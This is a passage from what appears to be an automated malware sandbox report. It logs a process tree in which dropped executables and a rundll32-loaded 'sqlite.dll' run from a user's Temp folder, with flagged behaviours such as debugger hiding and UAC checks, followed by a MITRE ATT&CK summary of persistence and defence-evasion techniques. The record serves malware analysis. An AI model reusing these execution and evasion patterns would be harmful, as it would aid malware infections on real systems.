- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:6636
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:1264
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:7712
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
PID:7896
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:5596 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
PID:7600
-
-
C:\Users\Admin\AppData\Local\Temp\13AE.exeC:\Users\Admin\AppData\Local\Temp\13AE.exe1⤵
- Executes dropped EXE
PID:6824
-
C:\Users\Admin\AppData\Local\Temp\3EB7.exeC:\Users\Admin\AppData\Local\Temp\3EB7.exe1⤵
- Executes dropped EXE
PID:7156
-
C:\Users\Admin\AppData\Local\Temp\6FBB.exeC:\Users\Admin\AppData\Local\Temp\6FBB.exe1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6180
-
C:\Users\Admin\AppData\Local\Temp\F24A.exeC:\Users\Admin\AppData\Local\Temp\F24A.exe1⤵
- Executes dropped EXE
PID:7464
-
C:\Users\Admin\AppData\Local\Temp\333.exeC:\Users\Admin\AppData\Local\Temp\333.exe1⤵
- Executes dropped EXE
PID:7596
Network
MITRE ATT&CK Enterprise v6
Persistence
Modify Existing Service
1Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
Disabling Security Tools
1Install Root Certificate
1Modify Registry
4Virtualization/Sandbox Evasion
1Web Service
1